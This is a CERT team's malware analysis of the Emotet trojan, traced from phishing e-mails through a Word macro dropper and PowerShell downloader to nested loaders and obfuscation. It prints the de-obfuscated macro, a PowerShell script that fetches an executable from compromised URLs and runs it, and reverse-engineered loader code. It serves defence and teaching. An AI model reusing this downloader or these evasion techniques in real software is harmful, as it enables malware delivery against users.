{
	"id": "38411aa3-15f5-4bd3-9bb3-415ceb7ae68d",
	"created_at": "2026-04-06T00:13:18.967259Z",
	"updated_at": "2026-04-10T03:21:37.032679Z",
	"deleted_at": null,
	"sha1_hash": "075b2620cdc687cb3b82d4eb438c3f3a9a97667d",
	"title": "Reverse engineering Emotet – Our approach to protect GRNET against the trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6343970,
	"plain_text": "Reverse engineering Emotet – Our approach to protect GRNET\r\nagainst the trojan\r\nBy Marios Levogiannis\r\nArchived: 2026-04-05 18:50:35 UTC\r\nTable of Contents\r\nPreamble\r\nChapter 1. From the e-mails to the binaries\r\nIntroduction\r\nThe e-mails\r\nThe MS Word documents\r\nThe VBScript Macros\r\nThe PowerShell script\r\nChapter 2. From the protector to the trojan\r\nIntroduction\r\nThe executable files\r\nThe decrypted resource\r\nThe nested executable\r\nChapter 3. Overcoming the malware obfuscation techniques\r\nIntroduction\r\nSymbol Resolution Obfuscation\r\nString Obfuscation\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 1 of 51\n\nControl Flow Obfuscation\r\nChapter 4. The trojan’s internals\r\nIntroduction\r\nMain flow overview\r\nPersistence mechanisms\r\nCommand-and-Control\r\nRequest Payload\r\nRequest\r\nHTTP request-response\r\nResponse\r\nResponse Payload\r\nChapter 5. Monitoring the updates\r\nIntroduction\r\nDeveloping a custom “Emotet” client\r\nAutomating repeated reverse-engineering processes\r\nEpilogue\r\nPreamble\r\nIn October 2020 we observed an outbreak of malicious e-mails reaching GRNET employees’ inboxes. Meanwhile,\r\nsimilar campaigns were also targeting several public and private sector organizations in Greece. After acquiring\r\ndozens of such e-mails, we started planning our defensive strategy. To do so, we started analyzing the malware\r\nthat was attached to the emails and realized that were dealing with the infamous Emotet trojan.\r\nIn this document, we describe the steps of our analysis including the reverse engineering process of the malware\r\nexecutables, how we overcame the binary obfuscation techniques it employed, and how we determined the\r\nmalware’s internals. In the course of our work, we were able to discover the list of IP addresses that constituted\r\nthe network of Command-and-Control (C2) servers of Emotet. 
This information was very useful because we\r\nused it to detect any network connections from the GRNET network to the Emotet C2 network. Such\r\nconnections would indicate a potentially compromised workstation on our premises. Overall, the goals of our\r\nanalysis were to (a) create an infrastructure that receives new updates of the Emotet trojan and keeps our list of C2\r\nIP addresses up to date and (b) understand the trojan’s persistence mechanism to perform forensic investigations\r\non compromised workstations.\r\nOn January 27, 2021 Europol announced that it had completely taken down Emotet. The same day our update-monitoring infrastructure received an update which was Europol’s clean-up payload scheduled to be executed on\r\nApril 25, 2021 at 12:00 p.m. Hopefully, this will be the last time that we hear about Emotet. Meanwhile, we had\r\nbeen working on analyzing Emotet up to the time of Europol’s announcement. We release our analysis results\r\nhoping that IT professionals will find them useful when trying to protect against similar trojans in the future.\r\nIn Chapter 1 we describe the malicious e-mails and the malware dropper (a macro-enabled MS Word document)\r\ndelivered via those e-mails. If you are already familiar with Emotet’s dropper you may skip directly to the next\r\nchapters. In Chapter 2 we analyze the malware’s multi-layer Protector responsible for unpacking, decrypting and\r\nrunning the trojan for the first time. In Chapter 3 we describe the binary obfuscation techniques incorporated in\r\nthe trojan itself as well as the ways to bypass them. In Chapter 4 we provide an in-depth description of the trojan’s\r\ninner workings, its persistence mechanism, the communication with the Command-and-Control servers network\r\nand the way we discovered the C2 network. 
Finally, in Chapter 5 we briefly describe the process we followed to\r\nretrieve and analyze new payloads served by the C2 network.\r\nWe have published the de-compiled code of referenced functions as well as the utilities that we implemented\r\nduring the analysis in a GitHub repository.\r\nThis work was carried out under the supervision of GRNET’s Chief Information Security Officer, Dimitris\r\nMitropoulos.\r\nDimitris Kolotouros – Head of IT Security Department, GRNET\r\nMarios Levogiannis – Senior IT Security Engineer, GRNET\r\nFigure 0. Emotet stages overview\r\nChapter 1. From the e-mails to the binaries\r\nIntroduction\r\nOctober 2020.\r\nSeven months have passed since the first COVID-19 lockdown in Greece. The pandemic finds GRNET with a\r\nlargely broadened IT Security agenda heavily linked with the state’s current digital transformation (involving\r\nseveral new applications being developed and maintained in house). The aforementioned developments, together\r\nwith the work-from-home style that has just arrived, completely redefined the security perimeter and priorities of\r\nGRNET CERT. A new era comes with new challenges.\r\nSomewhere in between the various ongoing tasks, a number of weird looking e-mails that reached GRNET\r\nemployees came to our notice. They all had a similar form, i.e., replies to legitimate mails that either contain a\r\nURL or an encrypted ZIP attachment and its password.\r\nThe e-mails\r\nFirst, to raise awareness, we notified all GRNET employees. Then, we started collecting and analyzing the\r\nsuspicious e-mails. Initially, we inspected their source code looking for similarities.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 3 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 4 of 51\n\nFigure 1. E-mails delivering Emotet dropper via URL (left) and attachment (right)\r\nOur analysis led to several interesting remarks:\r\nAll e-mails were replies to legitimate e-mails. 
The e-mail subject followed a specific pattern, i.e., “Re:\r\n\u003cORIGINAL MAIL SUBJECT\u003e”. Also, the e-mail body contained the quoted original e-mail body.\r\nThe sender’s display name was altered to match that of the original e-mail.\r\nHowever, the sender’s e-mail address was some unrelated e-mail address (several compromised e-mail\r\naccounts were used).\r\nThe body of the reply contained either a URL or an attachment.\r\nIn the case of the URL, the text contained a legitimate domain name (e.g. gmail.com). Nevertheless,\r\nthe actual target was completely different. Our investigation indicated that the targets were compromised\r\nwebsites used by the attackers to host the malicious documents.\r\nIn the case of the attachment we observed encrypted ZIP files with the corresponding password\r\ncontained in the reply body. Note that password-encrypted attachments are commonly used to\r\nbypass any malware detection running on e-mail servers.\r\nFinally, in all cases we ended up with MS Word documents.\r\nThe MS Word documents\r\nBy this point, we had already been informed about similar cases affecting other public and private sector\r\norganizations in Greece. Thus, a conventional incident response was not enough; we wanted to further analyze the\r\nmalware.\r\nOur analysis started with the Word documents. When opening one of the documents, the victim sees a fake pop-up\r\nwindow. In fact, this is just an image inside the document imitating a legitimate pop-up window. In each document\r\nthe fake pop-up window phrasing was different, but in every case it was there to persuade the victim to enable\r\nmacro execution.\r\nFigure 2. 
Fake MS Word pop-ups in Emotet dropper\r\nWe will continue by analyzing one of the MS Word documents. All other documents were similar to the one\r\nexamined, albeit with minor differences.\r\nThe VBScript Macros\r\nTo see what would happen when a user enabled the macros, we examined the corresponding VBScript. The entry-point Document.Open() called function Q4hxwcihtett() of module Iauesnh6lzhaf :\r\nFigure 3. The VBScript macro entry-point\r\nThe function code, as we observe below, was obfuscated:\r\nFigure 4. The main VBScript macro module\r\nWe started following the code flow manually to understand it. This manual process revealed that most of the code\r\nwas indeed irrelevant. Specifically, for each meaningful code instruction, the obfuscation process had generated a\r\nbunch of meaningless instructions placed before the meaningful one. So, most of the de-obfuscation effort was to\r\nidentify each block and isolate the meaningful code instruction out of the block.\r\nLuckily enough, the attackers had left some traces that were helpful to us. As we noticed, their obfuscating tool\r\nhad a serious issue (nobody’s perfect). In particular, it did not apply the indentation of the original instruction to\r\nthe instructions of the replacement block. As a result, the original indentation could be found on the first\r\ninstruction of each block. 
This issue gave us a way to automatically detect the blocks and isolate the last\r\ninstruction of each block, which we knew was the meaningful instruction of the block.\r\nThe following obfuscation techniques were identified:\r\nDeliberate run-time errors in junk instructions (which were ignored because of the On Error Resume Next\r\nstatement),\r\nString construction using one or more of the following:\r\nString concatenation,\r\nUse of undefined variables that resolve to empty strings,\r\nString replacements with the Replace() function,\r\nConversion of ASCII codes to strings with the ChrW() function,\r\nRetrieval of values from hidden user form control elements,\r\nAlternation between upper and lower case letters in symbol names, exploiting the case insensitivity of\r\nWindows OS,\r\nUse of the line-continuation character _ to break statements across multiple lines.\r\nThen, we only had to manually de-obfuscate some lines of code (the original number of lines was a little more\r\nthan 400). The result was the following:\r\n01: Rem Attribute VBA_ModuleType=VBADocumentModule\r\n02: Option VBASupport 1\r\n03: Private Sub Document_open()\r\n04: Set storyRange = ThisDocument.StoryRanges.Item(1)\r\n05: Set commandLine = Mid(storyRange, 5, Len(storyRange))\r\n06: commandLine = Replace(commandLine, \"][ 1) jjkgS [] []w\", Empty)\r\n07: Set objProcess = CreateObject(\"winmgmts:Win32_Process\")\r\n08: Set objProcessStartup = CreateObject(\"winmgmts:Win32_ProcessStartup\")\r\n09: objProcessStartup.ShowWindow = 0\r\n10: objProcess.Create commandLine, Empty, objProcessStartup\r\n11: End Sub\r\nHence, we were able to answer an important question: “What happens when the user executes this macro?”\r\nWell, it spawns a process by calling the Win32_Process.Create() method (line 10). The startup information\r\nparameter says “do not show a window” (line 9). 
Further, the command line parameter holds the command that\r\nwill be invoked by the spawned process. As we can observe in the code, the command is already in the document\r\n(lines 4-5) together with some junk that is removed (line 6).\r\nSo there was something more in the document itself apart from the fake popup window.\r\nThe PowerShell script\r\nFirst, we removed the formatting. In this way we revealed a paragraph that was kept out of the victim’s sight (it\r\nwas formatted with a font size of 2px and a white font color):\r\nFigure 5. Obfuscated PowerShell command hidden in document body\r\nThis looked obfuscated, too. But we already know how to de-obfuscate it, i.e. Replace(commandLine, \"][ 1)\r\njjkgS [] []w\", Empty) :\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 10 of 51\n\nFigure 6. De-obfuscated PowerShell command\r\nThe result would attempt to run a PowerShell script that is encoded in base64 format. We decoded it to discover\r\nthe actual PowerShell script:\r\nFigure 7. Base64-decoded PowerShell script\r\nAfter performing a proper indentation, i.e. 
split lines on each ‘ ; ‘ and perform indentations on code blocks ‘ { ‘\r\nand ‘ } ‘, we got the following:\r\n$1D2 =[tYpE](\"{3}{1}{4}{5}{0}{2}\"-f 'ecTo','SteM.','Ry','sy','Io.','diR');\r\n$tJ8m4B =[TYpe](\"{2}{4}{5}{1}{3}{0}\"-f 'r','iNTmAnAg','sYsteM.nE','e','T','.SerVIcEpO') ;\r\n$Ysa212g=('N'+('b7ib0'+'0'));\r\n$S95cz34=$I0phsdk + [char](64) + $Ixdbxto;\r\n$Qdfg2cp=(('Chns'+'7')+'2'+'d');\r\n(dIR variABle:1D2).valuE::\"CR`eAteDir`ectory\"($HOME + ((('8U'+'L')+('Pj'+'q')+('6t3'+'_8UL'+'Jvn'+'k')+('7'+'yk'\r\n$Qo08jci=('F'+'5'+('ocx'+'ex'));\r\n( ITEM vARIAblE:Tj8M4B ).VAlUe::\"SeC`U`RI`TyPRoTOc`OL\" = (('Tl'+'s1')+'2');\r\n$R7w053i=(('Nue'+'l2')+'4'+'k');\r\n$Tedbr00 = ('N'+'1p'+('jur'+'3u'));\r\n$H_8yni0=('J6'+'a'+('f'+'fv6'));\r\n$Roz09dp=('V'+('t9'+'1oph'));\r\n$Glkvf7b=$HOME+(('{0'+'}Pjq6'+'t'+'3_'+'{0'+'}Jvnk7yk{0}') -F[Char]92)+$Tedbr00+('.e'+'xe');\r\n$Ads4mxg=(('E'+'2n')+'0j'+'qo');\r\n$Q4b1g5n=.('new-o'+'b'+'jec'+'t') nEt.WEBcLieNt;\r\n$Boiep01=((('ht'+'tp:]['+' ')+'1'+((') '))+'jj'+(('kgS [] []w'+']['+' 1)'+' '))+('jj'+'kgS []')+(' []wi'+'nnh')+\r\n$Q9eccc5=(('F'+'o4')+'g'+('2'+'rk'));\r\nforeach ($S7m_bsh in $Boiep01){\r\n try{\r\n $Q4b1g5n.\"d`oWnL`Oa`DfIlE\"($S7m_bsh, $Glkvf7b);\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 11 of 51\n\n$E4fktea=('D'+'li'+('0'+'4n_'));\r\n If ((\u0026('Get'+'-Ite'+'m') $Glkvf7b).\"l`e`Ngth\" -ge 47912) {\r\n ([wmiclass]('wi'+('n'+'32')+'_P'+('r'+'ocess'))).\"CR`e`AtE\"($Glkvf7b);\r\n $Klmmlcr=(('V6z'+'43'+'q')+'d');\r\n break;\r\n $Myse8pt=('S8'+('266j'+'7'))\r\n }\r\n } catch{\r\n \r\n }\r\n}\r\n$Xwnf9b5=('R_'+('1kl'+'w')+'o')\r\nWe then noticed some common obfuscation techniques:\r\nString formatting to scramble string elements (e.g. {3}{1}{4}{5}{0}{2}\"-f\r\n'ecTo','SteM.','Ry','sy','Io.','diR' ),\r\nInsertions of the word-wrap operator ( ` ) in symbol names (e.g. 
d`oWnL`Oa`DfIlE ),\r\nAlteration between upper and lower case letters in symbol names exploiting the case insensitivity of\r\nWindows OS (e.g. nEt.WEBcLieNt ),\r\nString construction with concatenation and junk removal with the Replace() method,\r\nUse of undefined variables in string concatenations that actually act as empty strings, and\r\nInsertion of irrelevant code instructions.\r\nWe then used a PowerShell interpreter to evaluate strings and after removing irrelevant instructions and renaming\r\nthe variables, we had the de-obfuscated code:\r\nSystem.IO.Directory::CreateDirectory($HOME + \"\\\\Pjq6t3_\\\\Jvnk7yk\\\\\");\r\nSystem.Net.ServicePointManager::SecurityProtocol = \"Tls12\";\r\n$filepath = $HOME + \"\\\\Pjq6t3_\\\\Jvnk7yk\\\\N1pjur3u.exe\";\r\n$webclient = New-Object System.Net.WebClient;\r\n$urls = \"http://in*******hn.com/wp-admin/sA/\",\r\n \"http://sh*******se.com/wp-includes/ID3/IDz/\",\r\n \"http://blog.ma********ck.com/wp-admin/Spq/\",\r\n \"https://www.fr*********id.com/wp-content/g/\",\r\n \"https://pe********ed.com/vmware-unlocker/daC/\",\r\n \"https://me*******rm.com/wp-admin/Lb/\",\r\n \"http://ie*******bc.com/cow/2BB/\";\r\nforeach ($url in $urls) {\r\n try {\r\n $webclient.DownloadFile($url, $filepath);\r\n If ((Get-Item $filepath).Length -ge 47912) {\r\n ([wmiclass](\"Win32_Process\")).Create($filepath);\r\n break;\r\n }\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 12 of 51\n\n} catch {}\r\n}\r\nThe outcome was a script that was pretty simple. Actually, it attempts to download an executable file from several\r\nURLs and store it in the following path: $HOME\\Pjq6t3_\\Jvnk7yk\\N1pjur3u.exe (the URLs and the path were\r\ndifferent in each Word document). The size of each downloaded file is checked against a minimum value to ensure\r\nthat if the executable has been removed from the compromised website, the 404 HTML page will be ignored and\r\nthe next URL will be tried. 
When a file has been downloaded, it gets executed in a new process by calling the\r\nWin32_Process.Create() method.\r\nAfter following the same de-obfuscation procedure on every Word document available, we fetched the actual\r\nmalware executables from the URLs described in the PowerShell scripts. To do so, we imitated the PowerShell\r\nUser-Agent in a way; we needed to look like a malicious PowerShell script after all!\r\nPS. During the course of our analysis we came across several compromised e-mail accounts and websites. In all\r\ncases, we sent abuse reports to the corresponding abuse contacts informing them of their compromised assets.\r\nChapter 2. From the protector to the trojan\r\nIntroduction\r\nIn the previous chapter we documented the detection and preliminary analysis of malware that was distributed\r\nvia e-mails. We saw that the e-mails included an MS Word document with macros that spawn a new process\r\nrunning a PowerShell script on the victim’s machine. We also observed that the PowerShell script spawns one more\r\nprocess running an executable file downloaded from the Internet. Finally, we downloaded several of those\r\nexecutable files.\r\nWith the executable files at hand, we wanted to examine their internals without running them. Thus, we continued\r\nwith our reverse engineering process. At this point we started working with Ghidra, a free, open-source reverse\r\nengineering tool that was publicly released in 2019.\r\nThe executable files\r\nFirst, we loaded some of the executable files and observed that they were PE (Portable Executable) files compiled\r\nfor the x86 LE architecture.\r\nFigure 8. Emotet Protector’s architecture details\r\nWe started looking for meaningful data such as imported symbols and defined strings. To our surprise we\r\nobserved a number of different programs. 
Also, we noticed that in every executable file there was one defined\r\nstring looking like a random key.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 14 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 15 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 16 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 17 of 51\n\nFigure 9. Random keys in various Emotet Protectors’ strings\r\nApart from that, all the other strings seemed to differ between the executable files. Assuming that this is not a\r\ncoincidence, we looked for references to these strings in the de-compiled code. While looking, we noticed one\r\nmore similarity: although the surrounding code also seemed to differ between the executable files, there was an\r\nidentical code pattern that consumed the alleged key.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 18 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 19 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 20 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 21 of 51\n\nFigure 10. 
Code referencing the keys in various Protectors\r\nWe reverse engineered this part of the code, and ended up with the following code:\r\nWPARAM FUN_00407b2e(HINSTANCE param_1,int param_2)\r\n \r\n{\r\n byte *resourceBuffer;\r\n _LDR_RESOURCE_INFO resourceInfo;\r\n _IMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry;\r\n void *resource;\r\n word iv;\r\n dword resourceSize;\r\n...\r\n resource = (void *)0x0;\r\n resourceSize = 0;\r\n resourceInfo.Type = 10;\r\n resourceInfo.Name = 0x1e55;\r\n resourceInfo.Language = 0x409;\r\n...\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 22 of 51\n\n_LdrFindResource_U_PTR = GetProcAddress(s_ntdll_Module2,s_LdrFindResource_U_0040d8cc);\r\n...\r\n _LdrAccessResource_PTR = GetProcAddress(s_ntdll_Module2,s_LdrAccessResource_0040d8b4);\r\n iVar3 = (*_LdrFindResource_U_PTR)(0x400000,\u0026resourceInfo,3,\u0026ResourceDataEntry);\r\n if (-1 \u003c iVar3) {\r\n (*_LdrAccessResource_PTR)(0x400000,ResourceDataEntry,\u0026resource,\u0026resourceSize);\r\n }\r\n resourceBuffer = (byte *)VirtualAlloc((LPVOID)0x0,resourceSize,0x1000,0x40);\r\n memcpy(resourceBuffer,resource,resourceSize);\r\n DeriveKey(s_*FLrY4bO%4Th$J8Gt0z*zKiB)Yb#mGNy_0040d5b4,0x57,(uint)\u0026iv);\r\n DecryptResource(resourceBuffer,resourceSize,\u0026iv);\r\n (*(code *)resourceBuffer)();\r\n...\r\n}\r\nThe code above has the following functionality:\r\nAllocates an executable memory region with VirtualAlloc() , where 0x40 corresponds to\r\nPAGE_EXECUTE_READWRITE protection level,\r\nloads a specific resource from the executable’s resources into this region,\r\nderives a decryption key from the previously mentioned main key,\r\ndecrypts the contents of the resource using the derived key, and finally,\r\nuses the reference to the decrypted data as a function pointer and calls the function.\r\nIn deriveKey.c and decryptResource.c we include the reverse engineered code of the functions.\r\nThe attackers hid the actual payload in the resource described by the 
following RESOURCE_INFO variable:\r\nresourceInfo.Type = 10;\r\nresourceInfo.Name = 0x1e55;\r\nresourceInfo.Language = 0x409;\r\nWe found the payload in the resources section of the executable file, just below this mouse icon:\r\nFigure 11. The encrypted payload in Emotet Protector’s resources\r\nAt that point we had the encrypted payload, the main key, the key derivation function and the decryption function.\r\nThe only thing left was to decrypt the payload. So we reused the reverse engineered DeriveKey() and\r\nDecryptResource() functions to write a small decryption tool. After that we were able to decrypt the resource.\r\nThe decrypted resource\r\nLoading the decrypted resource in Ghidra was not just a drag-n-drop task. Apparently, there were no executable\r\nheaders to let Ghidra infer the architecture details. However, we knew that this payload was loaded in the memory\r\nspace of the initial executable, so we only had to define the architecture to be the same as the initial executable.\r\nFurthermore, we knew that the executable starts with a function (the pointer to the memory was handled as a\r\nfunction pointer as previously described). With a little manual work, we managed to analyze the payload with\r\nGhidra:\r\nFigure 12. The decrypted resource’s entry-point\r\nAs shown above, the code pushes some values onto the stack and then calls function FUN_0000002d() . The values\r\npushed onto the stack must be the function arguments. Among these values we noticed 0x529 and 0x31529 , which\r\nGhidra analyzed as memory references ( DAT_0000052e and DAT_0003152e ).\r\nDAT_0003152e contains the last 5 bytes of the executable, representing the null-terminated string “ dave ”, which\r\nlooked like a magic value.\r\nFigure 13. The referenced DAT_0003152e in decrypted resource\r\nDAT_0000052e was more interesting. 
The first two bytes were the printable characters “MZ”. As you probably\r\nknow this is the header signature of DOS MZ executables. This was a very good lead.\r\nThe file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the beginning of the file\r\n(the “magic number”). “MZ” are the initials of Mark Zbikowski, one of leading developers of MS-DOS.\r\nWikipedia\r\nFigure 14. The MZ magic value in the decrypted resource\r\nBy further examining the contents of DAT_0000052e , we identified some known MS-DOS stub strings, such as\r\nthe “This program cannot be run in DOS mode”. Of course this resembles a PE executable.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 25 of 51\n\nFigure 15. The MS-DOS stub in the decrypted resource\r\nWe went on reversing the FUN_0000002d() function assuming that its first argument is a reference to a PE\r\nexecutable.\r\nThe first difficulty was the mysterious function named FUN_00000456() . This function is invoked several times at\r\nthe beginning of FUN_0000002d() with a different argument each time. The return values are stored on local\r\nvariables and later on they are used as function pointers. Apparently, the function somehow resolved\r\nthese arguments to function addresses. Thus we needed to reverse engineer FUN_00000456() .\r\nFigure 16. Symbol resolving in the decrypted resource’s code\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 26 of 51\n\nExamining FUN_00000456() , we came across a technique for resolving library symbols. Specifically, the function\r\nretrieves the list of loaded libraries ( InLoadOrderModuleList ) from the Process Environment Block (PEB) and\r\nloops over each exported symbol of each library. On each loop a combined hash (32-bit value) of the library name\r\nand symbol name is calculated. 
If this value matches the function argument, a pointer to the address of the\r\ncorresponding function is returned (in resolveImportByHash.c we include the reverse engineered code of the\r\nfunction). As soon as we understood the internals of the hashing mechanism, we wrote a short script,\r\ngenerate_symbol_hashes1.py, that calculates these hash values for every symbol of several common libraries\r\n( ntdll.dll , kernel32.dll , etc) and exports them to a proper (and long) C enumeration:\r\nFigure 17. Calculated symbol hashes enumeration\r\nAfter importing the generated enum in our Ghidra project (and properly retyping the function), we had a clear\r\nview of which library functions are called later on:\r\nFigure 18. Reverse engineered symbol resolving\r\nWe were now able to continue reversing the FUN_0000002d() function. After some good amount of analysis we\r\nconcluded that the function is a pretty basic binary image loader with the following function signature (in\r\nloadBinary.c we include the complete reverse engineered code):\r\nbyte * loadBinary(byte *pe_ptr,byte *functionToRunHash,byte *functionToRunParam1, int functionToRunParam2,int c\r\nInternally, the function:\r\nallocates the memory buffer (in which the image will be loaded) with VirtualAlloc() ,\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 27 of 51\n\ncopies the headers from the source image,\r\ncopies the sections from the source image,\r\nloads and links the imported symbols (libraries),\r\napplies the relocations,\r\napplies proper memory protection to each section with VirtualProtect() (that way the executable\r\nsections of the loaded binary will be in executable memory sections),\r\nruns the executable’s entry-point,\r\nruns an exported symbol, the name of which matches the functionToRunHash hash value, passing the\r\nparameters functionToRunParam1 and functionToRunParam2 ,\r\nreturns a pointer to the allocated buffer.\r\nThe code at the beginning of the encrypted 
payload could now be translated into something meaningful:\r\nFigure 19. Reverse engineered entry-point\r\nIn this way, we knew that the executable included at address 0x0000052e will be loaded. Then, the entry-point is\r\ninvoked:\r\nFigure 20. Reverse engineered code running the nested binary\r\nWhen the entry-point returns, its exported symbol, i.e., an exported function with a name matching the\r\n0xed1c7b90 hash value, will run.\r\nWe exported the executable included at address 0x0000052e in a separate file and loaded it into Ghidra.\r\nThe nested executable\r\nWe loaded the nested executable in Ghidra and went straight to the entry-point. The entry-point just calls a\r\nfunction with a couple of parameters.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 28 of 51\n\nFigure 21. The nested executable’s entry-point\r\nYou might wonder what is this DAT_10004070 value. So did we. As a result, we had a quick look into its contents:\r\nFigure 22. MZ magic value in the nested executable\r\nThat “MZ” signature on the right looks familiar, doesn’t it? Well, this is another nested PE executable! 
It was like\r\nopening a matryoshka doll.\r\nWe reverse engineered the FUN_10001000() function and, as you can probably guess, it was yet another binary\r\nimage loader with the following function signature:\r\nstruct_paramContainer * __cdecl loadBinary(byte *pe_ptr,uint pe_size)\r\nInternally, it performs the following tasks:\r\nallocates the memory buffer (in which the image will be loaded) with VirtualAlloc() ,\r\ncopies the headers from the source image,\r\nfixes the relocation table entries according to the offset between the allocated buffer address and the\r\nImageBase ,\r\nloads and links the imported symbols (libraries),\r\ncopies the sections from the source image and applies proper memory protection to each section with\r\nVirtualProtect() (that way the executable sections of the loaded binary will be in executable memory),\r\ninitializes the Thread Local Storage (TLS) according to the image TLS Section,\r\nmodifies the base addresses ( ImageBaseAddress and LoaderData-\u003eInLoadOrderModuleList-\u003eDllBase ) of the\r\nProcess Environment Block (PEB) so that they point to the allocated buffer,\r\nruns the executable’s entry-point.\r\nFigure 23. Reverse engineered code running the actual trojan\r\nOnce again we exported the executable included at address 0x10004070 to a separate file that we had to explore.\r\nChapter 3. Overcoming the malware obfuscation techniques\r\nIntroduction\r\nIn the previous chapter, we explored the steps until the actual trojan is executed. We observed that the downloaded\r\nexecutable decrypts part of itself and executes the second-stage payload. This payload, in turn, executes another\r\npayload, i.e. the executable that we will analyze in this chapter and Chapter 4.\r\nIn this chapter, we’ll fast-forward and describe the obfuscation techniques employed by the latter executable. 
This\r\nwill provide us with the necessary background to further explain its functionality in Chapter 4.\r\nSymbol Resolution Obfuscation\r\nThe first thing that we noticed after loading the executable in Ghidra was that it does not import any symbols. An\r\nexecutable of only 369 KB cannot plausibly have a Windows API implementation statically\r\nlinked. Hence, it became clear that it was probably using a custom mechanism to resolve symbols from system\r\nlibraries.\r\nFigure 24. Emotet trojan’s Symbol Tree\r\nStarting from the entry-point, we noticed the following lazy initialization pattern, the result of which is stored in a\r\nglobal variable and is used as a function pointer. The same pattern (and some variations of it) is used all over the\r\nexecutable.\r\nFigure 25. Symbol resolving in Emotet trojan’s entry-point\r\nCould this be the custom symbol resolution mechanism employed by the trojan to hide the APIs that it uses? To\r\nfind out, we reverse engineered functions FUN_00404190() and FUN_004040f0() . Indeed, these two functions\r\nwork almost like FUN_00000456() described in Chapter 2:\r\nFUN_00404190() starts from the Thread Information Block (the address of which is available from the\r\nFS segment register on 32-bit Windows), accesses the Process Environment Block (PEB) and iterates\r\nover the list of loaded modules ( InLoadOrderModuleList ). For each module, it calculates the hash of its\r\nlower-cased name and compares it against the specified parameter. If they match, the function returns the\r\nmodule’s base address. Essentially, it works like GetModuleHandle() , but instead of specifying the\r\nmodule’s name, the caller specifies the module name’s hash.\r\nFUN_004040f0() parses the module specified in the first parameter to find its export table and iterates over\r\nthe exported symbols. 
For each exported symbol, it calculates the hash of its name and compares it against\r\nthe value specified in the second parameter. If they match, it either returns the address that the symbol\r\npoints to (if the symbol is an export) or recursively resolves the symbol forwarded from another module (if\r\nthe symbol is a forwarder).\r\nThis technique is called API Hashing. In findModuleByHash.c and findModuleExportByHash.c we include the\r\nreverse engineered code of the functions.\r\nAgain, we wrote a short script, generate_symbol_hashes2.py, that calculates the hashes for every symbol of some\r\ncommon libraries (e.g. ntdll.dll , kernel32.dll , etc.) and exports them to two C enumerations:\r\nFigure 26. Calculated library and symbol names hashes enumerations\r\nAfter importing the enumerations in Ghidra, we had a clear view of the modules and functions imported by these\r\ncalls.\r\nFigure 27. Emotet trojan’s reverse engineered symbol resolving\r\nString Obfuscation\r\nWe noticed that the binary did not contain any strings. This made us suspicious because it is impossible for an\r\nexecutable that performs any meaningful functionality not to contain any strings. As a result, we assumed that some\r\nkind of string obfuscation was used. The following is the full list of the strings that we identified.\r\nFigure 28. List of defined strings in Emotet trojan\r\nThe first use of a string that we encountered was in a call to LoadLibraryW() , the only parameter of which is the\r\nname of the library to be loaded. The value passed to LoadLibraryW() is returned from function\r\nFUN_004035f0() , which in this case operates on binary data at memory address 0x40d7f0 . 
It became apparent\r\nthat this function must be doing some kind of transformation (read: decryption) to the data pointed to by its input.\r\nFigure 29. Emotet trojan’s call of string decryption function\r\nWe reverse engineered the function and confirmed our guess: its purpose is to decrypt the input binary data to\r\na Unicode string. The first 4 bytes of the binary data are the XOR key, the next 4 bytes are the string’s encrypted\r\nlength and the rest is the encrypted string itself. After decrypting the length, the function iterates over all quadruples\r\nof encrypted characters (remember that the key is 4 bytes long) until all have been decrypted.\r\nFigure 30. Emotet trojan’s string decryption internals\r\nFor the sake of completeness, in decryptWideString.c we included the reverse engineered code of that function.\r\nTwo more versions of this function exist in the executable: one that decrypts the ciphertext to an ASCII string and\r\none to a byte array. Luckily, all are compatible with each other as ciphertexts are processed as 32-bit integers.\r\nOnly their output types differ.\r\nWe implemented a tool to decrypt any string or byte array in the executable. The source code can be found in\r\ndecrypt_bytes.py.\r\n$ ./decrypt_bytes.py nested-payload-2.exe 0xb9f0\r\nshlwapi.dll\r\nControl Flow Obfuscation\r\nWe continued our analysis with function FUN_0406860() , the first function that the entry-point calls, and\r\nobserved some kind of control flow obfuscation. Specifically, the function’s body is split into multiple if\r\nblocks, wrapped in a while loop. The flow is determined by a control variable that is set at the end of each\r\nblock. Furthermore, as seen from the function graph below, the majority of the blocks have the same predecessor\r\nand successor blocks. 
